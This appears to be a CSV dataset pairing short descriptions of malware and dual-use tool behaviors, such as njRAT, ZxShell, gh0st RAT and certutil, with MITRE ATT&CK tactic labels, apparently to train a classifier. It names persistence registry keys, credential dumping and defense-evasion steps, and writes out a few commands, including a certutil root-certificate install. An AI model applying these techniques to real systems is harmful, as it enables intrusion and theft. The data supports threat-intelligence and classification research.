Zebrocy decodes its secondary payload and writes it to the victim’s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads.,['TA0005:Defense Evasion']
Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.,['TA0010:Exfiltration']
Zebrocy has a command to delete files and directories.,['TA0005:Defense Evasion']
"Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the echo %APPDATA% command to list the contents of the directory. Zebrocy can obtain the current execution path as well as perform drive enumeration.",['TA0007:Discovery']
"Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.",['TA0011:Command and Control']
Zebrocy stores all collected information in a single file before exfiltration.,['TA0009:Collection']
Zebrocy performs persistence with a logon script via adding to the Registry key HKCU\Environment\UserInitMprLogonScript.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Zebrocy uses SMTP and POP3 for C2.,['TA0011:Command and Control']
Zebrocy identifies network drives when they are added to victim systems.,['TA0007:Discovery']
Zebrocy enumerates information about connected storage devices.,['TA0007:Discovery']
"Zebrocy uses the tasklist and wmic process get Capture, ExecutablePath commands to gather the processes running on the system.",['TA0007:Discovery']
Zebrocy executes the reg query command to obtain information in the Registry.,['TA0007:Discovery']
Zebrocy creates an entry in a Registry Run key for the malware to execute on startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Zebrocy has a command to create a scheduled task for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format.,['TA0009:Collection']
Zebrocy's Delphi variant was packed with UPX.,['TA0005:Defense Evasion']
Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.,['TA0011:Command and Control']
"Zebrocy collects the OS version, computer name and serial number for the storage volume C:\. Zebrocy also runs the systeminfo command to gather system information.",['TA0007:Discovery']
Zebrocy runs the ipconfig /all command.,['TA0007:Discovery']
Zebrocy uses netstat -aon to gather network connection information.,['TA0007:Discovery']
Zebrocy gets the username from the system.,['TA0007:Discovery']
Zebrocy gathers the current time zone and date information from the system.,['TA0007:Discovery']
Zebrocy uses HTTP for C2.,['TA0011:Command and Control']
Zebrocy uses cmd.exe to execute commands on the system.,['TA0002:Execution']
One variant of Zebrocy uses WMI queries to gather information.,['TA0002:Execution']
"ZeroCleare can deploy a vulnerable, signed driver on a compromised host to bypass operating system safeguards.",['TA0005:Defense Evasion']
ZeroCleare can receive command line arguments from an operator to corrupt the file system using the RawDisk driver.,['TA0002:Execution']
ZeroCleare can corrupt the file system and wipe the system drive on targeted hosts.,['TA0040:Impact']
ZeroCleare has used a vulnerable signed VBoxDrv driver to bypass Microsoft Driver Signature Enforcement protections and subsequently load the unsigned RawDisk driver.,['TA0004:Privilege Escalation']
ZeroCleare has the ability to uninstall the RawDisk driver and delete the `rwdsk` file on disk.,['TA0005:Defense Evasion']
ZeroCleare can call the `GetSystemDirectoryW` API to locate the system directory.,['TA0002:Execution']
ZeroCleare can use a malicious PowerShell script to bypass Windows controls.,['TA0002:Execution']
"ZeroCleare can use the `IOCTL_DISK_GET_DRIVE_GEOMETRY_EX`, `IOCTL_DISK_GET_DRIVE_GEOMETRY`, and `IOCTL_DISK_GET_LENGTH_INFO` system calls to compute disk size.",['TA0007:Discovery']
ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.,['TA0005:Defense Evasion']
Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ZeroT has used DLL side-loading to load malicious payloads.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ZeroT shellcode decrypts and decompresses its RC4-encrypted payload.,['TA0005:Defense Evasion']
ZeroT has encrypted its payload with RC4.,['TA0005:Defense Evasion']
ZeroT can download additional payloads onto the victim.,['TA0011:Command and Control']
Some ZeroT DLL files have been packed with UPX.,['TA0005:Defense Evasion']
ZeroT has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit steganography.,['TA0011:Command and Control']
ZeroT has used RC4 to encrypt C2 traffic.,['TA0011:Command and Control']
"ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.",['TA0007:Discovery']
"ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server.",['TA0007:Discovery']
ZeroT has used HTTP for C2.,['TA0011:Command and Control']
ZeroT can add a new service to ensure PlugX persists on the system when delivered as another payload onto the system.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes.,['TA0005:Defense Evasion']
Zeroaccess is a kernel-mode rootkit.,['TA0005:Defense Evasion']
Zeus Panda can hook GetClipboardData function to watch for clipboard pastes to collect.,['TA0009:Collection']
Zeus Panda obfuscates the macro commands in its initial payload.,['TA0005:Defense Evasion']
Zeus Panda can launch remote scripts on the victim’s machine.,['TA0002:Execution']
Zeus Panda hooks processes by leveraging its own IAT hooked functions.,"['TA0009:Collection', 'TA0006:Credential Access']"
Zeus Panda decrypts strings in the code during the execution process.,['TA0005:Defense Evasion']
Zeus Panda encrypts strings with XOR. Zeus Panda also encrypts all configuration and settings in AES and RC4.,['TA0005:Defense Evasion']
Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its track.,['TA0005:Defense Evasion']
Zeus Panda searches for specific directories on the victim’s machine.,['TA0007:Discovery']
Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.,['TA0011:Command and Control']
Zeus Panda can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.,"['TA0009:Collection', 'TA0006:Credential Access']"
Zeus Panda modifies several Registry keys under HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\ to disable phishing filters.,['TA0005:Defense Evasion']
"Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Zeus Panda uses PowerShell to download and execute the payload.,['TA0002:Execution']
Zeus Panda checks for running processes on the victim’s machine.,['TA0007:Discovery']
Zeus Panda checks for the existence of a Registry key and if it contains certain values.,['TA0007:Discovery']
Zeus Panda adds persistence by creating Registry Run keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Zeus Panda can take screenshots of the victim’s machine.,['TA0009:Collection']
"Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.",['TA0007:Discovery']
"Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.",['TA0007:Discovery']
"Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.",['TA0007:Discovery']
Zeus Panda collects the current system time and sends it back to the C2 server.,['TA0007:Discovery']
Zeus Panda uses HTTP for C2 communications.,['TA0011:Command and Control']
Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.,['TA0002:Execution']
Zox has the ability to upload files from a targeted system.,['TA0009:Collection']
Zox has been encoded with Base64.,['TA0005:Defense Evasion']
Zox has the ability to leverage local and remote exploits to escalate privileges.,['TA0004:Privilege Escalation']
Zox can enumerate files on a compromised host.,['TA0007:Discovery']
Zox can download files to a compromised machine.,['TA0011:Command and Control']
Zox has the ability to list processes.,['TA0007:Discovery']
Zox has the ability to use SMB for communication.,['TA0008:Lateral Movement']
Zox has used the .PNG file format for C2 communications.,['TA0011:Command and Control']
Zox can enumerate attached drives.,['TA0007:Discovery']
ZxShell has a command to clear system event logs.,['TA0005:Defense Evasion']
"ZxShell has a command called RunAs, which creates a new process as another user or process context.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ZxShell hooks several API functions to spawn system threads.,"['TA0009:Collection', 'TA0006:Credential Access']"
ZxShell can transfer files from a compromised host.,['TA0009:Collection']
ZxShell can disable the firewall by modifying the registry key HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile.,['TA0005:Defense Evasion']
ZxShell can kill AV products' processes.,['TA0005:Defense Evasion']
ZxShell is injected into a shared SVCHOST process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ZxShell has a feature to perform SYN flood attack on a host.,['TA0040:Impact']
"ZxShell has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322.",['TA0001:Initial Access']
ZxShell can delete files from the system.,['TA0005:Defense Evasion']
ZxShell has used FTP for C2 connections.,['TA0011:Command and Control']
ZxShell has a command to open a file manager and explorer on the system.,['TA0007:Discovery']
ZxShell has a command to transfer files from a remote host.,['TA0011:Command and Control']
ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
ZxShell has a feature to create local user accounts.,['TA0003:Persistence']
ZxShell can create Registry entries to enable services to run.,['TA0005:Defense Evasion']
ZxShell can leverage native API including RegisterServiceCtrlHandler to register a service.RegisterServiceCtrlHandler,['TA0002:Execution']
ZxShell can launch port scans.,['TA0007:Discovery']
ZxShell can use ports 1985 and 1986 in HTTP/S communication.,['TA0011:Command and Control']
"ZxShell has a command, ps, to obtain a listing of processes on the system.",['TA0007:Discovery']
ZxShell can set up an HTTP or SOCKS proxy.,['TA0011:Command and Control']
ZxShell can query the netsvc group value data located in the svchost group Registry key.,['TA0007:Discovery']
ZxShell has remote desktop functionality.,['TA0008:Lateral Movement']
ZxShell has used rundll32.exe to execute other DLLs and named pipes.,['TA0005:Defense Evasion']
ZxShell can capture screenshots.,['TA0009:Collection']
ZxShell can create a new service for execution.,['TA0002:Execution']
"ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory.",['TA0007:Discovery']
ZxShell can collect the owner and organization information from the target workstation.,['TA0007:Discovery']
ZxShell can check the services on the system.,['TA0007:Discovery']
ZxShell supports functionality for VNC sessions.,['TA0008:Lateral Movement']
ZxShell has a command to perform video device spying.,['TA0009:Collection']
ZxShell has used HTTP for C2 connections.,['TA0011:Command and Control']
ZxShell can launch a reverse command shell.,['TA0002:Execution']
ZxShell can create a new service using the service parser function ProcessScCommand.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ZxxZ can collect data from a compromised host.,['TA0009:Collection']
ZxxZ has used a XOR key to decrypt strings.,['TA0005:Defense Evasion']
ZxxZ has been encoded to avoid detection from static analysis tools.,['TA0005:Defense Evasion']
ZxxZ can download and execute additional files.,['TA0011:Command and Control']
ZxxZ has relied on victims to open a malicious attachment delivered via email.,['TA0002:Execution']
ZxxZ has been disguised as a Windows security update service.,['TA0005:Defense Evasion']
"ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.",['TA0002:Execution']
ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`.,['TA0007:Discovery']
ZxxZ can search the registry of a compromised host.,['TA0007:Discovery']
ZxxZ has used scheduled tasks for persistence and execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ZxxZ can search a compromised host to determine if it is running Windows Defender or Kasperky antivirus.,['TA0007:Discovery']
"ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.",['TA0001:Initial Access']
ZxxZ has collected the host name and operating system product name from a compromised machine.,['TA0007:Discovery']
ZxxZ can collect the username from a compromised host.,['TA0007:Discovery']
adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.,['TA0011:Command and Control']
adbupd can run a copy of cmd.exe.,['TA0002:Execution']
adbupd can use a WMI script to achieve persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
at can be used to schedule a task on a system to be executed at a specific date or time.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
build_downer has the ability to download files from C2 to the infected host.,['TA0011:Command and Control']
"build_downer has added itself to the Registry Run key as ""NVIDIA"" to appear legitimate.",['TA0005:Defense Evasion']
build_downer has the ability to use the WinExec API to execute malware on a compromised host.,['TA0002:Execution']
build_downer has the ability to add itself to the Registry Run key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
build_downer has the ability to detect if the infected host is running an anti-virus process.,['TA0007:Discovery']
build_downer can extract malware from a downloaded JPEG.,['TA0005:Defense Evasion']
build_downer has the ability to send system volume information to C2.,['TA0007:Discovery']
build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.,['TA0007:Discovery']
ccf32 has used `xcopy \\\c$\users\public\path.7z c:\users\public\bin\.7z /H /Y` to archive collected files.,['TA0009:Collection']
ccf32 can be used to automatically collect files from a compromised host.,['TA0009:Collection']
ccf32 can collect files from a compromised host.,['TA0009:Collection']
ccf32 can upload collected data and files to an FTP server.,['TA0010:Exfiltration']
ccf32 can delete files and folders from compromised machines.,['TA0005:Defense Evasion']
ccf32 can parse collected files to identify specific file extensions.,['TA0007:Discovery']
"ccf32 has created a hidden directory on targeted systems, naming it after the current local time .",['TA0005:Defense Evasion']
ccf32 can temporarily store files in a hidden directory on the local host.,['TA0009:Collection']
ccf32 has copied files to a remote machine infected with Chinoxy or another backdoor.,['TA0009:Collection']
ccf32 can run on a daily basis using a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ccf32 can determine the local time on targeted machines.,['TA0007:Discovery']
ccf32 has used `cmd.exe` for archiving data and deleting files.,['TA0002:Execution']
certutil may be used to Base64 encode collected data.,['TA0009:Collection']
certutil has been used to decode binaries hidden inside certificate files as Base64 information.,['TA0005:Defense Evasion']
certutil can be used to download files from a given URL.,['TA0011:Command and Control']
certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\cert512121.der.,['TA0005:Defense Evasion']
cmd can be used to delete files from the file system.,['TA0005:Defense Evasion']
cmd can be used to find files and directories with native functionality such as dir commands.,['TA0007:Discovery']
cmd can be used to copy files to/from a remotely connected external system.,['TA0011:Command and Control']
cmd can be used to copy files to/from a remotely connected internal system.,['TA0008:Lateral Movement']
cmd can be used to find information about the operating system.,['TA0007:Discovery']
cmd is used to execute programs and other actions at the command-line interface.,['TA0002:Execution']
down_new has the ability to list the directories on a compromised host.,['TA0007:Discovery']
down_new has the ability to download files to the compromised host.,['TA0011:Command and Control']
down_new has the ability to list running processes on a compromised host.,['TA0007:Discovery']
down_new has the ability to detect anti-virus products and processes on a compromised host.,['TA0007:Discovery']
down_new has the ability to gather information on installed applications.,['TA0007:Discovery']
down_new has the ability to base64 encode C2 communications.,['TA0011:Command and Control']
down_new has the ability to AES encrypt C2 communications.,['TA0011:Command and Control']
down_new has the ability to identify the system volume information of a compromised host.,['TA0007:Discovery']
down_new has the ability to identify the MAC address of a compromised host.,['TA0007:Discovery']
down_new has the ability to use HTTP in C2 communications.,['TA0011:Command and Control']
dsquery can be used to gather information on user accounts within a domain.,['TA0007:Discovery']
dsquery can be used to gather information on permission groups within a domain.,['TA0007:Discovery']
"dsquery can be used to gather information on domain trusts with dsquery * -filter """" -attr *.",['TA0007:Discovery']
"dsquery has the ability to enumerate various information, such as the operating system and host name, for systems within a domain.",['TA0007:Discovery']
esentutl can be used to collect data from local file systems.,['TA0009:Collection']
esentutl can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`.,['TA0005:Defense Evasion']
esentutl can be used to copy files from a given URL.,['TA0011:Command and Control']
esentutl can be used to copy files to/from a remote share.,['TA0008:Lateral Movement']
esentutl can copy `ntds.dit` using the Volume Shadow Copy service.,['TA0006:Credential Access']
esentutl can be used to read and write alternate data streams.,['TA0005:Defense Evasion']
ftp may be used to exfiltrate data separate from the main command and control protocol.,['TA0010:Exfiltration']
ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.,['TA0011:Command and Control']
ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment.,['TA0008:Lateral Movement']
gh0st RAT is able to wipe event logs.,['TA0005:Defense Evasion']
gh0st RAT is able to open a remote shell to execute commands.,['TA0002:Execution']
A gh0st RAT variant has used DLL side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"gh0st RAT has decrypted and loaded the gh0st RAT DLL into memory, once the initial dropper executable is launched.",['TA0005:Defense Evasion']
gh0st RAT has encrypted TCP communications to evade detection.,['TA0011:Command and Control']
gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.,['TA0011:Command and Control']
gh0st RAT has the capability to to delete files.,['TA0005:Defense Evasion']
gh0st RAT can download files to the victim’s machine.,['TA0011:Command and Control']
gh0st RAT has a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
gh0st RAT has altered the InstallTime subkey.,['TA0005:Defense Evasion']
"gh0st RAT has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions.",['TA0002:Execution']
gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2.,['TA0011:Command and Control']
gh0st RAT has the capability to list processes.,['TA0007:Discovery']
gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.,['TA0007:Discovery']
gh0st RAT has added a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
A gh0st RAT variant has used rundll32 for execution.,['TA0005:Defense Evasion']
gh0st RAT can capture the victim’s screen remotely.,['TA0009:Collection']
"gh0st RAT can execute its service if the Service key exists. If the key does not exist, gh0st RAT will create and run the service.",['TA0002:Execution']
gh0st RAT can load DLLs into memory.,['TA0002:Execution']
gh0st RAT has used Zlib to compress C2 communications data before encrypting it.,['TA0011:Command and Control']
gh0st RAT uses RC4 and XOR to encrypt C2 traffic.,['TA0011:Command and Control']
"gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information.",['TA0007:Discovery']
gh0st RAT can create a new service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
gsecdump can dump LSA secrets.,['TA0006:Credential Access']
gsecdump can dump Windows password hashes from the SAM.,['TA0006:Credential Access']
hcdLoader provides command-line access to the compromised system.,['TA0002:Execution']
hcdLoader installs itself as a service for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"httpclient encrypts C2 content with XOR using a single byte, 0x12.",['TA0011:Command and Control']
httpclient uses HTTP for command and control.,['TA0011:Command and Control']
httpclient opens cmd.exe on the victim.,['TA0002:Execution']
iKitten will zip up the /Library/Keychains directory before exfiltrating it.,['TA0009:Collection']
iKitten prompts the user for their credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
"iKitten saves itself with a leading ""."" so that it's hidden from users by default.",['TA0005:Defense Evasion']
iKitten collects the keychains on the system.,['TA0006:Credential Access']
iKitten lists the current processes running.,['TA0007:Discovery']
iKitten adds an entry to the rc.common file for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
iKitten will look for the current IP address.,['TA0007:Discovery']
"ifconfig can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.",['TA0007:Discovery']
"ipconfig can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.",['TA0007:Discovery']
jRAT can capture microphone recordings.,['TA0009:Collection']
jRAT can capture clipboard data.,['TA0009:Collection']
"jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.",['TA0006:Credential Access']
"jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.",['TA0006:Credential Access']
jRAT has a function to delete files from the victim’s machine.,['TA0005:Defense Evasion']
jRAT can browse file systems.,['TA0007:Discovery']
jRAT can download and execute files.,['TA0011:Command and Control']
jRAT has been distributed as HTA files with JScript.,['TA0002:Execution']
"jRAT has the capability to log keystrokes from the victim’s machine, both offline and online.","['TA0009:Collection', 'TA0006:Credential Access']"
"jRAT’s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.",['TA0005:Defense Evasion']
jRAT can map UPnP ports.,['TA0007:Discovery']
jRAT can steal keys for VPNs and cryptocurrency wallets.,['TA0006:Credential Access']
jRAT can query and kill system processes.,['TA0007:Discovery']
jRAT can serve as a SOCKS proxy server.,['TA0011:Command and Control']
jRAT can support RDP control.,['TA0008:Lateral Movement']
jRAT can be configured to reconnect at certain intervals.,['TA0010:Exfiltration']
jRAT has the capability to take screenshots of the victim’s machine.,['TA0009:Collection']
"jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.",['TA0007:Discovery']
jRAT payloads have been packed.,['TA0005:Defense Evasion']
jRAT can list and manage startup entries.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
jRAT collects information about the OS as well as system up-time upon receiving a connection from a backdoor.,['TA0007:Discovery']
jRAT can gather victim internal and external IPs.,['TA0007:Discovery']
jRAT can list network connections.,['TA0007:Discovery']
jRAT can list local services.,['TA0007:Discovery']
jRAT has the capability to capture video from a webcam.,['TA0009:Collection']
jRAT has been distributed as HTA files with VBScript.,['TA0002:Execution']
jRAT has command line access.,['TA0002:Execution']
jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.,['TA0002:Execution']
macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.,['TA0002:Execution']
"macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.",['TA0005:Defense Evasion']
macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.,['TA0005:Defense Evasion']
macOS.OSAMiner has used `curl` to download a Stripped Payloads from a public facing adversary-controlled webpage.,['TA0011:Command and Control']
macOS.OSAMiner has placed a Stripped Payloads with a `plist` extension in the Launch Agent's folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
macOS.OSAMiner has used `launchctl` to restart the Launch Agent.,['TA0002:Execution']
macOS.OSAMiner has used `ps ax | grep | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.,['TA0007:Discovery']
"macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.",['TA0005:Defense Evasion']
macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
macOS.OSAMiner can gather the device serial number and has checked to ensure there is enough disk space using the Unix utility `df`.,['TA0007:Discovery']
meek uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network as the intended destination.,['TA0011:Command and Control']
metaMain has used XOR-based encryption for collected files before exfiltration.,['TA0009:Collection']
metaMain can support an HKCMD sideloading start method.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
metaMain can collect files and system information from a compromised host.,['TA0009:Collection']
metaMain can decrypt and load other modules.,['TA0005:Defense Evasion']
metaMain's module file has been encrypted via XOR.,['TA0005:Defense Evasion']
metaMain can upload collected files and data to its C2 server.,['TA0010:Exfiltration']
metaMain has deleted collected items after uploading the content to its C2 server.,['TA0005:Defense Evasion']
metaMain can recursively enumerate files in an operator-provided directory.,['TA0007:Discovery']
metaMain can download files onto compromised systems.,['TA0011:Command and Control']
metaMain can log mouse events.,"['TA0009:Collection', 'TA0006:Credential Access']"
metaMain can create a named pipe to listen for and send data to a named pipe-based C2 server.,['TA0011:Command and Control']
metaMain has the ability to log keyboard events.,"['TA0009:Collection', 'TA0006:Credential Access']"
metaMain has stored the collected system files in a working directory.,['TA0009:Collection']
metaMain can write the process ID of a target process into the `HKEY_LOCAL_MACHINE\SOFTWARE\DDE\tpid` Registry value as part of its reflective loading activity.,['TA0005:Defense Evasion']
"metaMain can execute an operator-provided Windows command by leveraging functions such as `WinExec`, `WriteFile`, and `ReadFile`.",['TA0002:Execution']
metaMain can establish an indirect and raw TCP socket-based connection to the C2 server.,['TA0011:Command and Control']
"metaMain has authenticated itself to a different implant, Cryshell, through a port knocking and handshake procedure.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
metaMain can enumerate the processes that run on the platform.,['TA0007:Discovery']
"metaMain can inject the loader file, Speech02.db, into a process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"metaMain has reflectively loaded a DLL to read, decrypt, and load an orchestrator file.",['TA0005:Defense Evasion']
metaMain can take and save screenshots.,['TA0009:Collection']
metaMain can encrypt the data that it sends and receives from the C2 server using an RC4 encryption algorithm.,['TA0011:Command and Control']
metaMain can collect the computer name from a compromised host.,['TA0007:Discovery']
metaMain can collect the username from a compromised host.,['TA0007:Discovery']
metaMain has delayed execution for five to six minutes during its persistence establishment process.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"metaMain can change the `CreationTime`, `LastAccessTime`, and `LastWriteTime` file time attributes when executed with `SYSTEM` privileges.",['TA0005:Defense Evasion']
metaMain can use HTTP for C2 communications.,['TA0011:Command and Control']
"metaMain registered a WMI event subscription consumer called ""hard_disk_stat"" to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
nbtstat can be used to discover local NetBIOS domain names.,['TA0007:Discovery']
nbtstat can be used to discover current NetBIOS sessions.,['TA0007:Discovery']
netsh can be used to disable local firewall settings.,['TA0005:Defense Evasion']
netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
netsh can be used to set up a proxy tunnel to allow remote host access to an infected host.,['TA0011:Command and Control']
netsh can be used to discover system firewall settings.,['TA0007:Discovery']
"netstat can be used to enumerate local network connections, including active TCP connections and other network statistics.",['TA0007:Discovery']
ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.,['TA0011:Command and Control']
ngrok has been used by threat actors to configure servers for data exfiltration.,['TA0010:Exfiltration']
ngrok can tunnel RDP and other services securely over internet connections.,['TA0011:Command and Control']
ngrok can be used to proxy connections to machines located behind NAT or firewalls.,['TA0011:Command and Control']
ngrok has been used by threat actors to proxy C2 connections to ngrok service subdomains.,['TA0011:Command and Control']
njRAT gathers information about opened windows during the initial infection.,['TA0007:Discovery']
"njRAT is capable of manipulating and deleting registry keys, including those used for persistence.",['TA0005:Defense Evasion']
njRAT has used AutoIt to compile the payload and main script into a single executable after delivery.,['TA0005:Defense Evasion']
njRAT has a module that steals passwords saved in victim web browsers.,['TA0006:Credential Access']
njRAT can collect data from a local system.,['TA0009:Collection']
njRAT has modified the Windows firewall to allow itself to communicate through the firewall.,['TA0005:Defense Evasion']
njRAT has included a base64 encoded executable.,['TA0005:Defense Evasion']
njRAT has used HTTP to receive stolen information from the infected machine.,['TA0010:Exfiltration']
njRAT has used a fast flux DNS for C2 IP resolution.,['TA0011:Command and Control']
njRAT is capable of deleting files.,['TA0005:Defense Evasion']
njRAT can browse file systems using a file manager module.,['TA0007:Discovery']
njRAT can download files to the victim’s machine.,['TA0011:Command and Control']
njRAT is capable of logging keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
"njRAT can create, delete, or modify a specified Registry key or value.",['TA0005:Defense Evasion']
njRAT has used the ShellExecute function within a script.,['TA0002:Execution']
njRAT has used port 1177 for HTTP C2 communications.,['TA0011:Command and Control']
njRAT will attempt to detect if the victim system has a camera during the initial infection. njRAT can also detect any removable drives connected to the system.,['TA0007:Discovery']
njRAT has executed PowerShell commands via auto-run registry key persistence.,['TA0002:Execution']
njRAT can search a list of running processes for Tr.exe.,['TA0007:Discovery']
njRAT can read specific registry values.,['TA0007:Discovery']
njRAT has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\ and dropped a shortcut in %STARTUP%.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
njRAT has a module for performing remote desktop access.,['TA0008:Lateral Movement']
njRAT can identify remote hosts on connected networks.,['TA0007:Discovery']
njRAT can be configured to spread via removable drives.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
njRAT can capture screenshots of the victim’s machines.,['TA0009:Collection']
njRAT uses Base64 encoding for C2 traffic.,['TA0011:Command and Control']
njRAT enumerates the victim operating system and computer name during the initial infection.,['TA0007:Discovery']
njRAT enumerates the current user during the initial infection.,['TA0007:Discovery']
njRAT can access the victim's webcam.,['TA0009:Collection']
njRAT has used HTTP for C2 communications.,['TA0011:Command and Control']
njRAT can launch a command shell interface for executing commands.,['TA0002:Execution']
"If an initial connectivity check fails, pngdowner attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.",['TA0006:Credential Access']
pngdowner deletes content from C2 communications that was saved to the user's temporary directory.,['TA0005:Defense Evasion']
pngdowner uses HTTP for command and control.,['TA0011:Command and Control']
pwdump can be used to dump credentials from the SAM.,['TA0006:Credential Access']
route can be used to discover routing configuration information.,['TA0007:Discovery']
schtasks is used to schedule tasks on a Windows system to run at a specific date and time.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
spwebmember is used to enumerate and dump information from Microsoft SharePoint.,['TA0009:Collection']
sqlmap can be used to automate exploitation of SQL injection vulnerabilities.,['TA0001:Initial Access']
xCaon has added persistence via the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load which causes the malware to run each time any user logs in.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
xCaon has uploaded files from victims' machines.,['TA0009:Collection']
xCaon has decoded strings from the C2 server before executing commands.,['TA0005:Defense Evasion']
